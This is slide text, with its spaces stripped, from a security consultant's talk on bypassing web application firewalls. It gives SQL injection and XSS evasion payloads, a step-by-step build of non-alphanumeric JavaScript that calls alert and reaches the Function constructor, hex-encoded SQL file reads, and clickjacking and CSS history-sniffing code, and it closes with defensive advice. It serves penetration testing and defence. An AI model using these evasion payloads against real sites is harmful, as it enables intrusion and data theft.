Beruflich Dokumente
Kultur Dokumente
Firewalls (WAFs)
Ing. Pavol Luptk, CISSP, CEH
Lead Security Consultant
www.nethemba.com
www.nethemba.com
NethembaAllAboutSecurity
HighlyexperiencedcertifiedITsecurityexperts(CISSP,C|EH,SCSecA)
Corebusiness:Allkindsofpenetrationtests,comprehensiveweb
applicationsecurityaudits,localsystemandwifisecurityaudits,security
consulting,forensicanalysis,secureVoIP,ultrasecuresystems
OWASPactivists:LeadersofSlovak/CzechOWASPchapters,coauthors
ofthemostrecognizedOWASPTestingGuidev3.0,workingonnewversion
WearetheonlyoneinSlovakia/CzechRepublicthatoffer:
PenetrationtestsandsecurityauditsofSAP
SecurityauditofsmartRFIDcards
Uniqueownandsponsoredsecurityresearchinmanyareas(see
ourreferencesVulnerabilitiesinpublictransportSMStickets,
crackedthemostusedMifareClassicRFIDcards)
www.nethemba.com
WhatareWAFs?
EmergedfromIDS/IPSfocusedonHTTP
protocolandHTTPrelatedattacks
Usuallycontainalotofcomplexregexprules
tomatch
Supportspecialfeatureslikecookieencryption,
CSRFprotection,etc.
Exceptoffreemod_securitytheyarequite
expensive(andoftenthereisnocorrelation
betweenthepriceandtheirfilteringcapabilities)
www.nethemba.com
WAFsimplementations
Usuallytheyaredeployedinblacklistingmode
thatismorevulnerabletobypassesand
targetedattacks
Applicationcontext(typeofallowedinputs)is
necessarytoknowfordeployingofmoresecure
whitelistingmode
AllWAFscanbybypassed
WAFisjustaworkaround,butfromthesecurity
pointofviewitcanbecosteffective
www.nethemba.com
WAFfilterrules
DirectlyreflectsWAFeffectiveness
FormostWAFvendorstheyareclosely
guardedsecretsmostdeterminedattackers
areabletobypassthemwithoutseeingthe
actualrules
OpensourceWAFs(mod_security,PHPIDS)
haveopensourceruleswhichisbetterfor
morescrutinybyskilledpenetrationtesters
www.nethemba.com
TypicalWAFbypasses
Blocked Attack
Undetected modification
'or 1=1--
' or 2=2--
alert(0)
%00alert(0)
<script>alert(0)</script>
<script type=vbscript>MsgBox(0)</script>
' or ''''='r
'/**/OR/**/''''='
<script>alert(0)</script>
<img src=http://url
onload=alert(0)//></img>
1 or 1=1
(1)or(1)=(1)
eval(name)
x=this.name
X(0?$:name+1)
www.nethemba.com
Yes,WAFmaybealsobevulnerable!
WAFalsoincreasestheattacksurfaceofa
targetorganization
WAFmaybethetargetofandvulnerableto
maliciousattacks,e.g.XSS,SQLinjection,
denialofserviceattacks,remotecode
executionvulnerabilities
Thesevulnerabilitieshavebeenfoundinall
typesofWAFproducts(!)
www.nethemba.com
Typicalbypassflow
1.Findoutwhichcharacters/sequencesare
allowedbyWAFs
2.Makeanobfuscatedversionofyourinjected
payload
3.TestitandwatchfortheWAF/application
response
4.Ifitdoesnotwork,modifyitandtrystep2.
www.nethemba.com
Javascriptobfuscation
Javascripthasverypowerfulfeatures
JavascriptpayloadisusedinXSSattacks
Itisfullofevals,expressionclosures,generator
expressions,iterators,specialcharactersand
shortcuts
Supportsalotofencodings(unicode
multibytecharacters,hexadecimal,octal,
combinationofallofthem)
SupportsXOR,Encryption,Base64
www.nethemba.com
Nonalphanumericjavascriptcode
Evenifonlyfewcharactersarealloweditis
possibletoconstructfullyfunctionalcode:
_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;
$$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")
[$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}
+"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"")
[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({}
+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}
[$]+"")[__]+(($==$)+"")[___];($)[$$][$$]($$$+"('"+$_$+"')")()
([,,,,,,]=!{}+{},[[,]=!!+][+++])()[++++](~)
www.nethemba.com
Let'sbypassWAF!
Examplesituation:WAFblocksalpha
charactersandnumbers(probablynotavery
realsituation,justproofofconcept:)
Allowsonlyfewspecialcharacters(){}_=[];$!
+<>
Let'sgeneratefullynonalphanumericjavascript
code!
www.nethemba.com
PossibilitiesofJavascriptlanguage
Wecanusenumberstoobtainasinglecharacter
inastring,e.g.indexzeroforaccessingthefirst
characterabc[0]
Wecanuseaddition(+),subtraction(),
multiplication(*),division(/),modulus(%),
increment(++),decrement()
Weknowthatmathematicaloperatorsperform
automaticnumericconversionandstring
operatorsperformautomaticstringconversion
www.nethemba.com
Sourceofdifferentalphanumeric
charactersinJavascript
Javascript object /
error state
{}+''
String result
[object Object]
+[][+[]]
NaN
[][+[]]+[]
undefined
[![]]+[]
false
[!![]]+[]
true
www.nethemba.com
ShortestPossibleWaystoCreate
ZerowithoutUsingNumbers
Characters
+[]
+`'`
+`
-[]
-`'`
-`
Result
0
0
0
0
0
0
www.nethemba.com
Generatingnumbers
+[]//0
++[[]][+[]]//1
+!+[]//1
++[++[[]][+[]]][+[]]//2
!+[]+!+[]//2
++[++[++[[]][+[]]][+[]]][+[]]//3
!+[]+!+[]+!+[]//3
www.nethemba.com
Gainalphacharacterswithout
directlyusingthem
WhendefineJavascriptobjectusingtheobject
literalandconcatenatewithstring,theresultis
[objectObject]
_={}+'';//[objectObject]
alert(_[1])//returns'o'character
www.nethemba.com
Generatestringalertwithoutusing
anyalphanumericcharacters
Let'sstartwith'a'
WhatJavascriptobjectcontains'a'?
Wecanuse'NaN'(NotaNumber)
Accessemptystringwithindex0(undefined)
andconverttonumber(NaN)
+[][+[]]//result:NaN
www.nethemba.com
Generating'a'character
NaN[1]='a'
++[[]][+[]]//1
+[][+[]]+[]//resultstring:NaN
(+[][+[]]+[])[++[[]][+[]]]//a
Wehavecharacter'a'
www.nethemba.com
Generating'l'character
Usebooleanfalse
Wecanuse!(NOT)operator
e.g.''==0//true
Useblankarray(string)andthenNOToperator
toobtainboolean,wrapwith[]andconvertitto
string
([![]]+[])//stringfalse
www.nethemba.com
Generating'l'character
++[++[[]][+[]]][+[]]//2
([![]]+[])//stringfalse
'false'[2]=([![]]+[])[++[++[[]][+
[]]][+[]]]//'l'
Wehave'l'character!
www.nethemba.com
Generating'e'character
It'seasy,wecanusebooleantrue
([!![]]+[])//string'true'
++[++[++[[]][+[]]][+[]]][+[]]//3
'true'[3]=([!![]]+[])[++[++[++
[[]][+[]]][+[]]][+[]]]//e
Andwehave'e'character!
www.nethemba.com
Generating'r'character
It'seasy,wecanusebooleantrue
([!![]]+[])//string'true'
++[[]][+[]]//1
'true'[1]=([!![]]+[])[++[[]][+
[]]]//r
Andwehave'r'character!
www.nethemba.com
Generating't'character
It'seasy,wecanusebooleantrue
([!![]]+[])//string'true'
+[]//0
'true'[0]=([!![]]+[])[+[]]//t
Andwehave't'character!
www.nethemba.com
Andnowwehave'alert'string!
(+[][+[]]+[])[++[[]][+[]]]+([![]]+
[])[++[++[[]][+[]]][+[]]]+([!![]]+
[])[++[++[++[[]][+[]]][+[]]][+[]]]+
([!![]]+[])[++[[]][+[]]]+([!![]]+
[])[+[]]//string'alert'
www.nethemba.com
Howtoexecutethecodeofourchoice?
Itisnecessarytoreturnwindowobjectto
accessallpropertiesofwindow
Ifyoucanaccesstoaconstructor,youcan
accessFunctionconstructortoexecute
arbitrarycode
Theshortestpossiblewaytogetwindowis:
alert((1,[].sort)())//shows
windowobject!
WorksinallbrowsersexceptIE
www.nethemba.com
Howtogenerate'sort'string
Weknowhowtogeneratestring'alert'
Weneedtogenerate'sort'string
'false'[3]=([![]]+[])[++[++[++[[]]
[+[]]][+[]]][+[]]]//'s'
Wecangain'o'from[]+{}[objectObject]
([]+{})[++[[]][+[]]]//o
Wehavealreadygenerated'r'and't'
www.nethemba.com
Andnowwehave'sort'string
([![]]+[])[++[++[++[[]][+[]]][+[]]][+
[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])
[++[[]][+[]]]+([!![]]+[])[+[]]
//string'sort'
www.nethemba.com
Let'sbuildittogethercallalert(1)
(1,[].sort)().alert(1)
Afterchangingnumber1andallalpha
characterstotheirobfuscatedversionweget:
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]]
[+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++
[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]
+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+
[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]]
[+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+
([!![]]+[])[+[]]](++[[]][+[]])
//callsalert(1)!
www.nethemba.com
Howtocallanyarbitrary
Javascriptfunction
Usingthearrayconstructor(accessingthe
constructortwicefromanarrayobjectreturns
Function):
[].constructor.constructor(alert(1
))()
Weneedtogeneratetherest'c','n','u'letters,
gainthemfromtheoutputof[].sortfunction:
functionsort(){[nativecode]}
www.nethemba.com
SQLobfuscation
WhatisobfuscationofSQLinjectionvector?
DifferentDBMShavedifferentSQLsyntax,
mostofthemsupportUnicode,Base64,hex,
octalandbinaryrepresentation,escaping,
hashingalgorithms(MD5,SHA1)
Manyblacklistedcharacterscanbereplaced
bytheirfunctionalalternatives(0xA0inMySQL)
Obfuscatedcommentsitisdifficultto
determinewhatisacommentandwhatisnot
www.nethemba.com
SQLobfuscationexamples
SELECTCONCAT(char
(x'70617373',b'11101110110111101110010011
00100'))
s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
SELECT
LOAD_FILE(0x633A5C626F6F742E696E69)
(M)
SELECT(extractvalue(0x3C613E61646D696E3
C2F613,0x2F61))
www.nethemba.com
NewSQLfeatures
MySQL/PostgreSQLsupportsXMLfunctions:
SELECTUpdateXML('<scriptx=_></script>',
'/script/@x','src=//0x.lv');
HTML5supportslocalDBstorage(SQLite
3.1+)(openDatabaseobject)canbemisused
forpersistentXSS,localSQLinjectionattacks
www.nethemba.com
Existingobfuscationtools
Hackvertorhttp://hackvertor.co.uk/public
HackBar
https://addons.mozilla.org/enUS/firefox/addon/hack
Malzillahttp://malzilla.sourceforge.net/
Yourimagination:)
www.nethemba.com
Summary
WAFsarejustworkarounds!
ThebestsolutionistocareaboutsecurityineverySDLC
phaseandstrictlyvalidateallinputsandoutputsinthe
application
Usewhitelistinginsteadofblacklisting(bothinthe
applicationandWAF!)
Usemultilayersecurity3rdlayerdatabasearchitectureor
databasefirewalls
forSQLusepreparedstatements
forHTMLuseHTMLPurifierorOWASPAntiSamyproject
www.nethemba.com
References
WebApplicationObfuscation
http://www.amazon.com/WebApplicationObfuscati
XSSAttacks:CrossSiteScriptingExploitsand
Defense
http://www.amazon.com/XSSAttacksScriptingExp
SpecialthankstoMarioHeiderichandStefano
DiPaola
www.nethemba.com
UIredressingattacksclickjacking
<style>
iframe{filter:alpha(opacity=0);opacity:0;
position:absolute;top:0px;left0px;
height:300px;width:250px;}
img{position:absolute;top:0px;left:0px;
height:300px;width:250px;}
</style>
<imgsrc=WHATTHEUSERSSEES/>
<iframesrc=WHATTHEUSERISACTUALLYINTERACTING
WITH></iframe>
www.nethemba.com
Clickjackingprotection
BlocksusingXFRAME/OPTIONS:NEVER
<body>
<script>
if(top!=self)document.write('<plaintext>');
</script>
...
www.nethemba.com
CSSHistoryattack
<style>
a{position:relative;}
a:visited{position:absolute;}
</style>
<aid=vhref=http://www.google.com/>Google</a>
<script>
varl=document.getElementById(v);
varc=getComputedStyle(l).position;
c==absolute?alert(visited):alert(notvisited);
</script>
www.nethemba.com
CSSHistoryexploitationmethods
Socialnetworkdeanonymizationattacks
SessionID/CSRFtokenlocalbruteforceattack
LANscanners
FixedinFirefox4.0,currentbrowsersare
vulnerable
www.nethemba.com